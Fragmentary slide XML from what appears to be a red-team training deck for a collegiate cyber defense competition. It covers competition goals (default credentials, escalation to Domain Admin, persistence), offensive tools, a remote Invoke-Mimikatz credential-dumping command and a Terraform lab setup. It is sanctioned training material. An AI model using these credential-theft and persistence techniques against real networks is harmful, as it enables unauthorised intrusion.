              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) Invoke-Command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote_sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>] -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> c:\ }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note: You can import locally and execute remotely </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Import-Module ./Invoke-Mimikatz.ps1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> TARGET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Session on Remote Machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$cred = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>System.Management.Automation.PSCredential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ‘Administrator’, (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ConvertTo-SecureString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AsPlainText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -Force ‘password’)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Enter-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PSSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> PDC -Credential $cred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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8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5731-D3CD-44FB-A09A-08C69E57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CCDC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A383-3701-46E5-B3EB-125ACD60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10-12 servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6-7 Windows Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All joined to a domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically 1 vulnerable to MS08-067, now might be eternal blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3-4 Linux Machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often have simple/default creds to start with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Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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1812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FFE6-DB69-43B0-97D8-90B26289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01A-6F03-4F1D-96E9-FEA7CA52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Maintain root/Domain Admin access on all servers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Find Default Credential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Escalate to Local Admin/Root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Escalate to Domain Admin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Install persistence </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3417035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8B70-9413-4177-A316-B2D98C1B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E19C-5256-4C21-A995-64772EB9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Typically very few real vulnerabilities (or at least we never find them)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This means it's often a race to use default creds to establish persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Persistence has to be very good because if we lose it, we often never get it back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Teams seem to be able to block the subnets we're allowed to attack from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Persistence should make use of outbound connections which are typically not blocked.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291192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9F8-B79F-4C97-950B-A7D7D30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4CAF-B120-4294-A826-02BF1154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Cobalt Strike (Mass Exploitation, Persistence) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A 30 day license is typically given to all red teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Its persistence features are very good.  Its collaboration features are ok</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Training Videos Available Online (3-4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hrs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of content)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit (Mass Exploitation, Persistence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most Common Tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules for Lots of things (but learn them first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell Empire (Mass Exploitation, Persistence)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows only but a good fit for this environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CrackMapExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Mass Exploitation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Particularly useful in early game</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54395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2C22-5BEA-4144-8C61-391E27B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err="1"/>
              <a:t>Gameplan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D642-81FF-4A66-B086-508D26AE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goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pathway from unprivileged user creds to domain admin/root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Speed is of the essence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get a foothold as fast as possible, then you can be elegant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Being "noisy" is not a problem (at first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn now, not during the competition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The point of this environment is to allow you to test different techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The actual environment will be different so having a couple of techniques ready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408160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81BEF-9BE8-43A4-8FC9-3822BD8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Do EEEEEET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218F-FC3D-4D58-BAD0-551620A5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Terraform finishes it outputs IP Addresses and credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All Machines have Public IPs (Your choice on if you use them)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All Machines also on Internal subnet: 10.1.0.X  (PDC is 10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OpenVPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only needed if you want to connect to internal IPs directly from your laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>client.ovpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Replace the IP in the "REMOTE" line with the Kali IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start OpenVPN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows: Double click file or Right Click on tray icon and Import File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/Mac: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>openvpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>client.ovpn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Kali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dc303.pem ec2-user@[Kali IP]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RDP to Public IP of Any Windows Machine (Creds are in Terraform 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D811-990D-4B4E-9D45-065CC8AA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2A-4B24-4B6C-9E91-05554A49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https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Red Team Field Manual by Ben Clark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130000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3786-D3BC-4731-926D-7EF97B9C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 – Basic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81FB-2349-4A7A-AD35-FA007771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rough approximation to a CCDC environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a Functional Domain Automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include a Primary Domain Controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include several members who are joined to the domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include several domain user accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design it in such a way that there is at least one path to obtain domain admin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25135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6127-B288-443C-9154-34D4AE43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Steps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74F8-DA0B-45E0-AC0E-FEBB1D1D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Download Terraform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https://learn.hashicorp.com/terraform/getting-started/install.html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Clone / Download Project </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>WBCDomain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an AWS User (sub-user)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Aws Console -&gt; IAM-&gt;Users-&gt;Create a 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Enter User Name, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Programatic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Access, DevOps role (S3 not needed but ok)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Download or copy the access keys into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CWBDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AWSCreds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[default]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aws_access_key_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BLAH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aws_secret_access_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BLAH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Create a Key Pair: Console-&gt;EC2-&gt;Key Pairs-&gt;Create Key Pair, Name it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>dc303</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to match examples.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18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6127-B288-443C-9154-34D4AE43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Steps -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74F8-DA0B-45E0-AC0E-FEBB1D1D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you want to run tools directly from your PC (rather than from the Kali box in the environment),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Download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>openvpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (or install via package manager) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://openvpn.net/community-downloads/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After environment boots, replace the "REMOTE" line in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>client.ovpn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with the IP address of the KALI box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From the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Senario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directory run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>terraform apply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Wait ~15 minutes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When you are done with your environment (stop getting charged)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>terraform destroy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86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26FC-8D30-4910-BA17-A7A72D27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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Environment –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CC17-2DD4-492A-A28C-4628225E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2229"/>
            <a:ext cx="9905998" cy="3829426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WHAT?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terraform is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hashicorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Product</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automates Cloud Infrastructure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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standalone Executable (no “installation” process)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Available for Linux, Mac, Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relatively Simple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321475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57CA-34F9-42A6-8BE4-6ADEED11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 – Terraform Config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207AD-8F55-42F1-B670-DD5BD817C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597854"/>
            <a:ext cx="4876800" cy="4650545"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The provider section tells terraform what service to use and how to authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AWS credential file follows AWS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>standardS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[default]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aws_access_key_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BLAH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aws_secret_access_key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=BLAH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources are declared as a type then a resource name.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attributes go inside the curly braces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources can refer to each other using ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>type.name.attribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resources sometimes have nested sections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4BEF7-FEFB-468A-8616-6BFF2019C85C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457071" y="1597854"/>
            <a:ext cx="487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provider "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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shared_credentials_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AWScreds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region     = "us-west-2"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resource "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aws_vpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ccdc_vpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"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cidr_block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "10.1.0.0/24"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resource "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aws_security_group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ccdc_sg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"{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name = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allow_all_from_home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vpc_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "${aws_vpc.ccdc_vpc.id}"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ingress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from_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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to_port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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protocol = "-1"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cidr_blocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = ["73.14.226.60/32"]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4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4285-1039-495A-8AAE-B5550A9F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 – What’s Being Automated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1C8B75-F39D-4787-B7B6-A5F3DB1D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t2.micro (free-tier) Windows 2012R2 Instance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install domain tools and change computer name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reboot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
